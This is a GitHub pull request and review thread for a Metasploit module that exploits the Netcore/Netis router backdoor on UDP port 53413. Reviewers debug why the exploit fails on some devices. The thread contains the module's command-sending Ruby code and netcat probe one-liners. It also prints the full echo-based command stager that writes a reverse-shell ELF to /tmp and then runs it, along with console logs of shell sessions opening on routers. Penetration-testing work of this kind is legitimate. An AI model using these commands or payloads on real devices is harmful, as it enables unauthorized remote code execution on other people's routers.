### PR TITLE
add a module for netcore/netdis udp 53413 backdoor

### PR DESCRIPTION
**Pull request by nixawk**
Exploit netcore/netdis udp 53413 backdoor
## Environment Setup
- [x] Install qemu
- [ ] Download and install mipsel. Please read [the tutorial](https://people.debian.org/~aurel32/qemu/mipsel/README.txt)
- [ ] Starts the mipsel lab  
    a. `qemu-system-mipsel -M malta -kernel vmlinux-3.2.0-4-4kc-malta -hda debian_wheezy_mipsel_standard.qcow2 -append "root=/dev/sda1 console=tty0" -net nic -net user,hostfwd=tcp::22222-:22,hostfwd=udp::53413-:53413`  
- [ ] Put [vuln_squashfs-root.tar.gz](https://github.com/rapid7/metasploit-framework/files/267284/vuln_squashfs-root.tar.gz) to mipsel lab, extract it.  
   a. `scp -P22222 vuln_squashfs-root.tar.gz root@127.0.0.1:/root`  
   b. `tar xvf vuln_squashfs-root.tar.gz`  
- [ ] Run vuln programs.  
   a. `cd nw614 && chroot . /bin/igdmptd`
## Verification

List the steps needed to make sure this thing works
- [ ] Start `msfconsole`
- [ ] `use exploits/linux/misc/netcore_udp_53413_backdoor`

```
msf exploit(netcore_udp_53413_backdoor) > show options

Module options (exploit/linux/misc/netcore_udp_53413_backdoor):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    53413            yes       The target port
   TIMEOUT  1000             yes       The socket connect timeout in milliseconds


Exploit target:

   Id  Name
   --  ----
   0   MIPS Little Endian


msf exploit(netcore_udp_53413_backdoor) > set RHOST 192.168.1.1
RHOST => 192.168.1.1
msf exploit(netcore_udp_53413_backdoor) > check
[+] The target is vulnerable.
msf exploit(netcore_udp_53413_backdoor) > run

[*] Started reverse TCP handler on 192.168.1.2:4444
[*] Exploiting...
[*] Command Stager progress -  12.54% done (196/1563 bytes)
[*] Command Stager progress -  25.08% done (392/1563 bytes)
[*] Command Stager progress -  37.62% done (588/1563 bytes)
[*] Command Stager progress -  50.16% done (784/1563 bytes)
[*] Command Stager progress -  62.70% done (980/1563 bytes)
[*] Command Stager progress -  75.24% done (1176/1563 bytes)
[*] Command Stager progress -  87.78% done (1372/1563 bytes)
[*] Command Stager progress - 100.00% done (1563/1563 bytes)
[*] Command shell session 1 opened (192.168.1.2:4444 -> 192.168.1.1:54180) at 2016-05-16 00:52:43 -0500

pwd
/
ls
bin
cfg
dev
etc
lib
linuxrc
log
proc
sbin
sh
sys
tmp
usr
var
web
```

```
msf exploit(netcore_udp_53413_backdoor) > info

       Name: Netcore Udp 53413 Backdoor
     Module: exploit/linux/misc/netcore_udp_53413_backdoor
   Platform:
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2014-08-25

Provided by:
  Nixawk

Available targets:
  Id  Name
  --  ----
  0   MIPS Little Endian
  1   MIPS Big Endian

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  RHOST    192.168.1.1      yes       The target address
  RPORT    53413            yes       The target port
  TIMEOUT  1000             yes       The socket connect timeout in milliseconds

Payload information:

Description:
  Routers manufactured by Netcore, a popular brand for networking
  equipment in China, have a wide-open backdoor that can be fairly
  easily exploited by attackers. These products are also sold under
  the Netis brand name outside of China. This backdoor allows
  cybercriminals to easily run arbitrary code on these routers,
  rendering it vulnerable as a security device.

References:
  https://www.seebug.org/vuldb/ssvid-90227
  http://blog.trendmicro.com/trendlabs-security-intelligence/netis-routers-leave-wide-open-backdoor/
```

### CODE REVIEW

File: modules/exploits/linux/misc/netcore_udp_53413_backdoor.rb [hunk 1]
```diff
@@ -0,0 +1,103 @@
...
+  def vuln_version?
+    connect_udp
+    resp = []
+    ['netcore', '?'].each do |command|
+      send_command(command)
+      resp << udp_sock.get(timeout)
+    end
+    disconnect_udp
+    resp_str = resp.join(',')
+    true ? resp.length >= 1 && resp_str.include?("\x00\x00\x00\x05") : false
```
Comment (wchen-r7) [inline modules/exploits/linux/misc/netcore_udp_53413_backdoor.rb]: @join-us  Hmmmm I don't think that's how you use the conditional operator ```?:```. Take a look at this: http://stackoverflow.com/questions/4252936/how-do-i-use-the-conditional-operator-in-ruby

I think you probably just wanna do this:

```ruby
resp.length >= 1 && resp_str.include?("\x00\x00\x00\x05")
```

**Comment by join-us** [comment]
@wchen thanks.

**Comment by wchen-r7** [comment]
@join-us I don't think we have this router in the office, but I'll try to ask around. Meanwhile, could you please send us a pcap to show you getting a session? Email: msfdev[at]metasploit.com, thanks!

**Comment by join-us** [comment]
@wchen-r7 Please check msfdev inbox, and I've sent you a vuln lab.

**Comment by h00die** [comment]
Per #6876, I purchased a vulnerabile router to (I thought) write this module. It arrives wed, so I can verify on hardware by the weekend if you want to wait. I also built a scanner module for detection, which will be done by the weekend as well. Could land both PR at the same time.

**Comment by wchen-r7** [comment]
OK sounds good. We will wait :-)

**Comment by join-us** [comment]
@wchen-r7 @h00die I've added a **Environment Setup** part in order to exploit the vuln.

I've try the pr against my home router. It runs ok. When I test it against the mipsel lab, it shows error:
mipsel_lab

File: modules/exploits/linux/misc/netcore_udp_53413_backdoor.rb [hunk 2]
```diff
@@ -0,0 +1,103 @@
...
+
+  def send_command(data)
+    payload = "\x00" * 8
+    payload << data
+    udp_sock.put(payload)
+  end
+
+  def execute_command(cmd, _opts)
+    send_command(cmd)
+  end
```
Comment (void-in) [inline modules/exploits/linux/misc/netcore_udp_53413_backdoor.rb]: Where have we used this method?

Comment (join-us) [inline modules/exploits/linux/misc/netcore_udp_53413_backdoor.rb]: @void-in Custom ```execute_command``` in [**Module: Msf::Exploit::CmdStager**](https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/cmdstager.rb).

Comment (void-in) [inline modules/exploits/linux/misc/netcore_udp_53413_backdoor.rb]: @join-us Ah thanks. I didn't check the includes.

**Comment by join-us** [comment]
@wchen-r7  A pcap is sent to **msfdev**

**Comment by wchen-r7** [comment]
thanks.

**Comment by h00die** [comment]
I am unable to get this to work against my vuln router.
```
msf auxiliary(netis_backdoor_scanner) > use exploit/linux/misc/netcore_udp_53413_backdoor
msf exploit(netcore_udp_53413_backdoor) > show options

Module options (exploit/linux/misc/netcore_udp_53413_backdoor):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    53413            yes       The target port
   TIMEOUT  1000             yes       The socket response timeout in milliseconds


Exploit target:

   Id  Name
   --  ----
   0   MIPS Little Endian


msf exploit(netcore_udp_53413_backdoor) > set rhost 192.168.1.1
rhost => 192.168.1.1
msf exploit(netcore_udp_53413_backdoor) > set verbose true
verbose => true
msf exploit(netcore_udp_53413_backdoor) > exploit

[*] Started reverse TCP handler on 192.168.1.2:4444 
[*] Exploiting...
[*] Command Stager progress -  12.54% done (196/1563 bytes)
[*] Command Stager progress -  25.08% done (392/1563 bytes)
[*] Command Stager progress -  37.62% done (588/1563 bytes)
[*] Command Stager progress -  50.16% done (784/1563 bytes)
[*] Command Stager progress -  62.70% done (980/1563 bytes)
[*] Command Stager progress -  75.24% done (1176/1563 bytes)
[*] Command Stager progress -  87.78% done (1372/1563 bytes)
[*] Command Stager progress - 100.00% done (1563/1563 bytes)
[*] Exploit completed, but no session was created.
msf exploit(netcore_udp_53413_backdoor) > set target 1
target => 1
msf exploit(netcore_udp_53413_backdoor) > exploit

[*] Started reverse TCP handler on 192.168.1.2:4444 
[*] Exploiting...
[*] Command Stager progress -  12.54% done (196/1563 bytes)
[*] Command Stager progress -  25.08% done (392/1563 bytes)
[*] Command Stager progress -  37.62% done (588/1563 bytes)
[*] Command Stager progress -  50.16% done (784/1563 bytes)
[*] Command Stager progress -  62.70% done (980/1563 bytes)
[*] Command Stager progress -  75.24% done (1176/1563 bytes)
[*] Command Stager progress -  87.78% done (1372/1563 bytes)
[*] Command Stager progress - 100.00% done (1563/1563 bytes)
[*] Exploit completed, but no session was created.
msf exploit(netcore_udp_53413_backdoor) > 
```

From writing the scanner, I see that a "Login" prompt is obtained, and according to the disclosure its protected by a login.  However, I don't see where in the code that is accounted for.

**Comment by h00die** [comment]
Finished the scanner module for this.
Rebooted my router, and restarted msf.  Still can't get exploit to work.
I asked in the issue, but were you able to determine the login as it wasn't disclosed in the disclosure, nor do i see it in your code.

**Comment by join-us** [comment]
@h00die ```res.end_with?("\xD0\xA5Login:")``` is not a good idea. If someone open the backdoor at first time, authentication will not be needed later for some routers.

**Comment by join-us** [comment]
@h00die Could you output the commands results ? 

```
python -c "print 'A'*8 + 'netcore\x00'" | nc -u -vv 192.168.1.1 53413
```

```
python -c "print 'AA\x00\x00AAAA ls\x00'" | nc -u -vv 192.168.1.1 53413
```

**Comment by h00die** [comment]
```
h00die@kali:~# python -c "print 'A'*8 + 'netcore\x00'" | nc -u -vv 192.168.1.1 53413
gateway [192.168.1.1] 53413 (?) open
^C sent 17, rcvd 0
h00die@kali:~# python -c "print 'AA\x00\x00AAAA ls\x00'" | nc -u -vv 192.168.1.1 53413
gateway [192.168.1.1] 53413 (?) open
AAABAAbin
dev
etc
lib
media
proc
sbin
sys
tmp
usr
var
web
AAACAA
```

**Comment by h00die** [comment]
@join-us what model and firmware are you running?  I'm trying to get this exploit working against my router but not having any luck.

**Comment by join-us** [comment]
I've tested it against **Netcore NI360** second-generation.

**Comment by h00die** [comment]
I've been trying to debug this, but can't quite put my finger on it.
Steps:
1. reboot device
2. run `check`
3. says device is not vulnerable
4. check wireshark, device didn't respond to the 2 udp packets
4. reboot device (clear auth and any other potential issues)
5. run the first python/nc command, response received, something like 'login successfuls' or similar (if it matters, i can re-create)

I see there is a difference between the python and the module.  Something in there is making a difference.  Maybe a trailing null character or something similar.  I'd also suspect that this is the cause of the exploit not working on my device.

**Comment by join-us** [comment]
Too many times to try, or a issue for **check**. Could you show product details of your router ?

**Comment by h00die** [comment]
Wifi router is in, WF2414. It came with up to date firmware, but I downgraded to (copied from router web interface) Netis(WF2414)-V1.4.27001,2014.05.07 16:10
For the initial password, the only difference in the packet I noticed was one trailing character, I think it was \x0A but can't quite remember.  other than that, the two packets looked identical

**Comment by h00die** [comment]
I would say let this land as working on that specific platform. When I get some time, I can always submit a new PR with patching to get this also running on my device. Just don't see the logic in holding this up longer than it already has been

**Comment by join-us** [comment]
@h00die Could you send me your pcap ? Mail:  hap.ddup#gmail

**Comment by wchen-r7** [comment]
@join-us @h00die It looks like I should label this PR as delayed because you guys are still working on it.  Please let me know when ready, thanks.

**Comment by h00die** [comment]
Tonight it looks like the login is successful, however shell is still not connecting back.  
I did a reboot after each pcap to ensure it was a clean environment.
https://github.com/h00die/MSF-Testing-Scripts/tree/master/netcore

**Comment by h00die** [comment]
Created [netis_backdoor.py](https://github.com/h00die/MSF-Testing-Scripts/blob/master/netis_backdoor.py) to help support.  I'm going to start debugging this on my router some more

**Comment by h00die** [comment]
it looks like the file isn't being written to tmp on my router.
```
msf exploit(netcore_udp_53413_backdoor) > exploit

[*] Started reverse TCP handler on 192.168.1.2:4444 
[*] Exploiting...
[*] Command Stager progress -  12.54% done (196/1563 bytes)
[*] Command Stager progress -  25.08% done (392/1563 bytes)
[*] Command Stager progress -  37.62% done (588/1563 bytes)
[*] Command Stager progress -  50.16% done (784/1563 bytes)
[*] Command Stager progress -  62.70% done (980/1563 bytes)
^C[-] Exploit failed: Interrupt 
```
```
Netis> ls tmp
tmp

Netis>
```

**Comment by nixawk** [comment]
@h00die When we try to exploit the netcore backdoor, payloads will be uploaded to **`/tmp`**  by **`echo`** command.

```
["echo -en \\\\x7f\\\\x45\\\\x4c\\\\x46\\\\x01\\\\x01\\\\x01\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\x00\\\\x08\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x54\\\\x00\\\\x40\\\\x00\\\\x34\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00>>/tmp/grLmj",
 "echo -en \\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x34\\\\x00\\\\x20\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x40\\\\x00\\\\x00\\\\x00\\\\x40\\\\x00\\\\x0c\\\\x01>>/tmp/grLmj",
 "echo -en \\\\x00\\\\x00\\\\xc4\\\\x01\\\\x00\\\\x00\\\\x07\\\\x00\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\xfa\\\\xff\\\\x0f\\\\x24\\\\x27\\\\x78\\\\xe0\\\\x01\\\\xfd\\\\xff\\\\xe4\\\\x21\\\\xfd\\\\xff\\\\xe5\\\\x21\\\\xff\\\\xff\\\\x06\\\\x28\\\\x57>>/tmp/grLmj",
 "echo -en \\\\x10\\\\x02\\\\x24\\\\x0c\\\\x01\\\\x01\\\\x01\\\\xff\\\\xff\\\\xa2\\\\xaf\\\\xff\\\\xff\\\\xa4\\\\x8f\\\\xfd\\\\xff\\\\x0f\\\\x34\\\\x27\\\\x78\\\\xe0\\\\x01\\\\xe2\\\\xff\\\\xaf\\\\xaf\\\\x11\\\\x5c\\\\x0e\\\\x3c\\\\x11\\\\x5c\\\\xce\\\\x35>>/tmp/grLmj",
 "echo -en \\\\xe4\\\\xff\\\\xae\\\\xaf\\\\x01\\\\x67\\\\x0e\\\\x3c\\\\xc0\\\\xa8\\\\xce\\\\x35\\\\xe6\\\\xff\\\\xae\\\\xaf\\\\xe2\\\\xff\\\\xa5\\\\x27\\\\xef\\\\xff\\\\x0c\\\\x24\\\\x27\\\\x30\\\\x80\\\\x01\\\\x4a\\\\x10\\\\x02\\\\x24\\\\x0c\\\\x01\\\\x01>>/tmp/grLmj",
 "echo -en \\\\x01\\\\xfd\\\\xff\\\\x11\\\\x24\\\\x27\\\\x88\\\\x20\\\\x02\\\\xff\\\\xff\\\\xa4\\\\x8f\\\\x21\\\\x28\\\\x20\\\\x02\\\\xdf\\\\x0f\\\\x02\\\\x24\\\\x0c\\\\x01\\\\x01\\\\x01\\\\xff\\\\xff\\\\x10\\\\x24\\\\xff\\\\xff\\\\x31\\\\x22\\\\xfa\\\\xff>>/tmp/grLmj",
 "echo -en \\\\x30\\\\x16\\\\xff\\\\xff\\\\x06\\\\x28\\\\x62\\\\x69\\\\x0f\\\\x3c\\\\x2f\\\\x2f\\\\xef\\\\x35\\\\xec\\\\xff\\\\xaf\\\\xaf\\\\x73\\\\x68\\\\x0e\\\\x3c\\\\x6e\\\\x2f\\\\xce\\\\x35\\\\xf0\\\\xff\\\\xae\\\\xaf\\\\xf4\\\\xff\\\\xa0\\\\xaf\\\\xec>>/tmp/grLmj",
 "echo -en \\\\xff\\\\xa4\\\\x27\\\\xf8\\\\xff\\\\xa4\\\\xaf\\\\xfc\\\\xff\\\\xa0\\\\xaf\\\\xf8\\\\xff\\\\xa5\\\\x27\\\\xab\\\\x0f\\\\x02\\\\x24\\\\x0c\\\\x01\\\\x01\\\\x01>>/tmp/grLmj ; chmod 777 /tmp/grLmj ; /tmp/grLmj ; rm -f /tmp/grLmj"]
```

Please read **/path/to/metasploit-framework/lib/msf/core/exploit/cmdstager.rb**,  and  check if the router has **`echo`** command or not.

**Comment by h00die** [comment]
Ok, further investigation.
So funny thing with paths...

```
Netis> ls tmp
tmp

Netis> ls /tmp
/tmp

Netis> ls /tmp/
br_type
bridge_init
cfg-macclone
checkupfile
```
So that explains nothing in the tmp folder, you have to /tmp/.
Now, next thing, the file *is* getting created. I added a print_good line to show the output similar to @nixawk 
```
[*] Started reverse TCP handler on 0.0.0.0:4444 
[*] Exploiting...
[+] echo -en \\x7f\\x45\\x4c\\x46\\x01\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x08\\x00\\x01\\x00\\x00\\x00\\x54\\x00\\x40\\x00\\x34\\x00\\x00\\x00\\x00\\x00\\x00>>/tmp/zvpnp
[*] Command Stager progress -  12.54% done (196/1563 bytes)
[+] echo -en \\x00\\x00\\x00\\x00\\x00\\x34\\x00\\x20\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x40\\x00\\x00\\x00\\x40\\x00\\x0c\\x01>>/tmp/zvpnp
[*] Command Stager progress -  25.08% done (392/1563 bytes)
[+] echo -en \\x00\\x00\\xc4\\x01\\x00\\x00\\x07\\x00\\x00\\x00\\x00\\x10\\x00\\x00\\xfa\\xff\\x0f\\x24\\x27\\x78\\xe0\\x01\\xfd\\xff\\xe4\\x21\\xfd\\xff\\xe5\\x21\\xff\\xff\\x06\\x28\\x57>>/tmp/zvpnp
[*] Command Stager progress -  37.62% done (588/1563 bytes)
[+] echo -en \\x10\\x02\\x24\\x0c\\x01\\x01\\x01\\xff\\xff\\xa2\\xaf\\xff\\xff\\xa4\\x8f\\xfd\\xff\\x0f\\x34\\x27\\x78\\xe0\\x01\\xe2\\xff\\xaf\\xaf\\x11\\x5c\\x0e\\x3c\\x11\\x5c\\xce\\x35>>/tmp/zvpnp
^C[-] Exploit failed: Interrupt 
```
Now we check to see if its there.
```
Netis> ls /tmp/
br_type
...clip...
wan_type
workmode
zvpnp
```
So the file is there!  However, it looks like -en is being echoed to the file:
```
Netis> cat /tmp/zvpnp
-en \x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x08\x00\x01\x00\x00\x00\x54\x00\x40\x00\x34\x00\x00\x00\x00\x00\x00
-en \x00\x00\x00\x00\x00\x34\x00\x20\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x40\x00\x0c\x01
-en \x00\x00\xc4\x01\x00\x00\x07\x00\x00\x00\x00\x10\x00\x00\xfa\xff\x0f\x24\x27\x78\xe0\x01\xfd\xff\xe4\x21\xfd\xff\xe5\x21\xff\xff\x06\x28\x57
-en \x10\x02\x24\x0c\x01\x01\x01\xff\xff\xa2\xaf\xff\xff\xa4\x8f\xfd\xff\x0f\x34\x27\x78\xe0\x01\xe2\xff\xaf\xaf\x11\x5c\x0e\x3c\x11\x5c\xce\x35
```
So maybe this is a custom/old echo command?

**Comment by nixawk** [comment]
Some features of **`echo`** have been removed. Any good idea for this lab ? @h00die  @wchen-r7

**Comment by h00die** [comment]
```
Netis> ls -al /bin/echo
lrwxrwxrwx    1 root     0               7 May  7 16:18 /bin/echo -> busybox
```
Other potential ideas...
ftp?
```
/bin/stupid-ftpd-acl.sh
/bin/stupid-ftpd-common.2.sh
/bin/stupid-ftpd-common.sh
/bin/stupid-ftpd-user.2.sh
/bin/stupid-ftpd-user.sh
```
smb/samba mount w/ cp?
```
/bin/smb.samba-3.2.15.sh
/bin/smb.sh
```

While these are not great options, since its a SOHO router, theres a very small chance of someone network sniffing to see this.

For the meantime, I think the `check` should be changed (pseudo code to follow):
```
echo -ne hello > /tmp/<random>
cat /tmp/<random>
if "-ne" in response:
  vuln but not exploitable (at this point)
elsif response == "hello":
  exploitable
end
```

**Comment by h00die** [comment]
Wrote open-security/metasploit-framework#16 which tests echo to see if its an exploitable version or not.  Also wrote docs to explain this out and all.  I think this is the best solution at this point.

**Comment by nixawk** [comment]
Thanks, I'll check it later.

**Comment by h00die** [comment]
Probably want to remove the print_good with the payload echo command. Forgot to remove when debugging. What did 'check' do on your device?

**Comment by nixawk** [comment]
```
msf exploit(netcore_udp_53413_backdoor) > set RHOST 192.168.1.1
RHOST => 192.168.1.1
msf exploit(netcore_udp_53413_backdoor) > set RPORT 53413
RPORT => 53413
msf exploit(netcore_udp_53413_backdoor) > check
[+] The target is vulnerable.
msf exploit(netcore_udp_53413_backdoor) > exploit

[*] Started reverse TCP handler on 192.168.1.102:4444
[*] Exploiting...
[+] echo -en \\x7f\\x45\\x4c\\x46\\x01\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x08\\x00\\x01\\x00\\x00\\x00\\x54\\x00\\x40\\x00\\x34\\x00\\x00\\x00\\x00\\x00\\x00>>/tmp/HmFKE
[*] Command Stager progress -  12.54% done (196/1563 bytes)
[+] echo -en \\x00\\x00\\x00\\x00\\x00\\x34\\x00\\x20\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x40\\x00\\x00\\x00\\x40\\x00\\x0c\\x01>>/tmp/HmFKE
[*] Command Stager progress -  25.08% done (392/1563 bytes)
[+] echo -en \\x00\\x00\\xc4\\x01\\x00\\x00\\x07\\x00\\x00\\x00\\x00\\x10\\x00\\x00\\xfa\\xff\\x0f\\x24\\x27\\x78\\xe0\\x01\\xfd\\xff\\xe4\\x21\\xfd\\xff\\xe5\\x21\\xff\\xff\\x06\\x28\\x57>>/tmp/HmFKE
[*] Command Stager progress -  37.62% done (588/1563 bytes)
[+] echo -en \\x10\\x02\\x24\\x0c\\x01\\x01\\x01\\xff\\xff\\xa2\\xaf\\xff\\xff\\xa4\\x8f\\xfd\\xff\\x0f\\x34\\x27\\x78\\xe0\\x01\\xe2\\xff\\xaf\\xaf\\x11\\x5c\\x0e\\x3c\\x11\\x5c\\xce\\x35>>/tmp/HmFKE
[*] Command Stager progress -  50.16% done (784/1563 bytes)
[+] echo -en \\xe4\\xff\\xae\\xaf\\x01\\x66\\x0e\\x3c\\xc0\\xa8\\xce\\x35\\xe6\\xff\\xae\\xaf\\xe2\\xff\\xa5\\x27\\xef\\xff\\x0c\\x24\\x27\\x30\\x80\\x01\\x4a\\x10\\x02\\x24\\x0c\\x01\\x01>>/tmp/HmFKE
[*] Command Stager progress -  62.70% done (980/1563 bytes)
[+] echo -en \\x01\\xfd\\xff\\x11\\x24\\x27\\x88\\x20\\x02\\xff\\xff\\xa4\\x8f\\x21\\x28\\x20\\x02\\xdf\\x0f\\x02\\x24\\x0c\\x01\\x01\\x01\\xff\\xff\\x10\\x24\\xff\\xff\\x31\\x22\\xfa\\xff>>/tmp/HmFKE
[*] Command Stager progress -  75.24% done (1176/1563 bytes)
[+] echo -en \\x30\\x16\\xff\\xff\\x06\\x28\\x62\\x69\\x0f\\x3c\\x2f\\x2f\\xef\\x35\\xec\\xff\\xaf\\xaf\\x73\\x68\\x0e\\x3c\\x6e\\x2f\\xce\\x35\\xf0\\xff\\xae\\xaf\\xf4\\xff\\xa0\\xaf\\xec>>/tmp/HmFKE
[*] Command Stager progress -  87.78% done (1372/1563 bytes)
[+] echo -en \\xff\\xa4\\x27\\xf8\\xff\\xa4\\xaf\\xfc\\xff\\xa0\\xaf\\xf8\\xff\\xa5\\x27\\xab\\x0f\\x02\\x24\\x0c\\x01\\x01\\x01>>/tmp/HmFKE ; chmod 777 /tmp/HmFKE ; /tmp/HmFKE ; rm -f /tmp/HmFKE
[*] Command Stager progress - 100.00% done (1563/1563 bytes)
[*] Exploit completed, but no session was created.
```

**Comment by h00die** [comment]
very strange since I didn't really change the exploit functionality:

You can remove the print_good, that was left in by accident.
```
   def execute_command(cmd, _opts)
     send_command(cmd)
+    print_good(cmd)
   end
```
And here, only removed the check since it doesn't return a bool anymore
```
   def exploit
-    unless vuln_version?
-      print_status('Target is not vulnerable.')
-      return
-    end
-
     print_status('Exploiting...')
     connect_udp
     execute_cmdstager(:flavor => :echo, :linemax => 200)
     disconnect_udp
   end
```

So I'm really unsure what happened since I didn't change anything in the exploit part.
Good to see Check is good though :)

**Comment by h00die** [comment]
@nixawk one thing i did think of, you call vuln_version (which is no longer) in order to guarantee the backdoor was opened via password.  I removed that call, but if someone doesn't call `check` first, it will never have been opened.

This could be fixed by just making an unlock function which sends the password or something, that unbinds it from check.

I dont mind working on it some more, but to prevent working on multiple versions, can you either merge, or just make a new commit w/ my changes (and the md file) so we're all looking at the same thing?

**Comment by nixawk** [comment]
It's better to output `echo -en ....` with **vprint_status**

**Comment by h00die** [comment]
Ilike that idea!

**Comment by h00die** [comment]
update vprint_status, modularized autehntication.  give it another look see.

**Comment by h00die** [comment]
@nixawk try the update yet?

**Comment by nixawk** [comment]
Thanks @h00die @wchen-r7 . It goes well.

```
msf exploit(netcore_udp_53413_backdoor) > set RHOST 192.168.1.1
RHOST => 192.168.1.1
msf exploit(netcore_udp_53413_backdoor) >
msf exploit(netcore_udp_53413_backdoor) > show options

Module options (exploit/linux/misc/netcore_udp_53413_backdoor):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.1.1      yes       The target address
   RPORT    53413            yes       The target port
   TIMEOUT  1000             yes       The socket response timeout in milliseconds


Exploit target:

   Id  Name
   --  ----
   0   MIPS Little Endian


msf exploit(netcore_udp_53413_backdoor) > set VERBOSE true
VERBOSE => true
msf exploit(netcore_udp_53413_backdoor) > check
[+] The target is vulnerable.
msf exploit(netcore_udp_53413_backdoor) > exploit

[*] Started reverse TCP handler on 192.168.1.26:4444
[*] Exploiting...
[*] Command Stager progress -  12.54% done (196/1563 bytes)
[*] Command Stager progress -  25.08% done (392/1563 bytes)
[*] Command Stager progress -  37.62% done (588/1563 bytes)
[*] Command Stager progress -  50.16% done (784/1563 bytes)
[*] Command Stager progress -  62.70% done (980/1563 bytes)
[*] Command Stager progress -  75.24% done (1176/1563 bytes)
[*] Command Stager progress -  87.78% done (1372/1563 bytes)
[*] Command shell session 1 opened (192.168.1.26:4444 -> 192.168.1.1:19043) at 2016-07-26 20:09:27 -0500
[*] Command Stager progress - 100.00% done (1563/1563 bytes)

pwd
/
ls -al /tmp
lrwxrwxrwx    1 0        0               8 Jun  3  2013 /tmp -> /var/tmp
ls -al /tmp/
drwxr-xr-x    4 0        0             280 Jan  7 18:33 .
drwxrwxrwt   10 0        0             240 Jan  1 00:00 ..
drwxr-xr-x    2 0        0              60 Jan  1 00:00 bulletin
-rwxr-xr-x    1 0        0          710488 Jan  1  2000 cgitest.cgi
-rw-r--r--    1 0        0             405 Jan  1 00:00 cpu_stat
srwxr-xr-x    1 0        0               0 Jan  1 00:00 ipc_switch
----------    1 0        0           10788 Jan  7 18:33 log
drwxr-xr-x    2 0        0              40 Jan  1  2000 param
----------    1 0        0              34 Jan  1 00:00 param.tar.gzip
-rw-r--r--    1 0        0              26 Jan  1 00:00 passwd
-rw-r--r--    1 0        0               0 Jan  1 00:00 pluto_log
-rw-r--r--    1 0        0           48364 Jan  1 00:00 proute_update
-rwxrwxrwx    1 0        0             268 Jan  7 18:33 qHYyn
-rw-r--r--    1 0        0              29 Jan  1  2000 version_1

```

**Comment by h00die** [comment]
Awesome! Merge my changes, and then we get this landed! Get one more PR out of the queue

**Comment by nixawk** [comment]
I merge your doc and code directly, and the reason is as follow:

screen shot 2016-07-26 at 20 24 25

**Comment by nixawk** [comment]
@wchen-r7 The module works well. Please check it later.

**Comment by h00die** [comment]
No issues with that. It was the easiest solution by far.

**Comment by h00die** [comment]
@wchen-r7 can this get some love :) 
@nixawk and I both agree its good to go, tested on multiple hardware, all bugs worked out.  This was a while coming, so it should be solid.

**Comment by wchen-r7** [comment]
@h00die Landed. Thanks! Sorry for the lag!!

**Comment by wchen-r7** [comment]
# Release Notes

**netcore/netdis udp 53413 backdoor** - This module gains access to a backdoor for routers manufactured by Netcore.

**Pull request merged**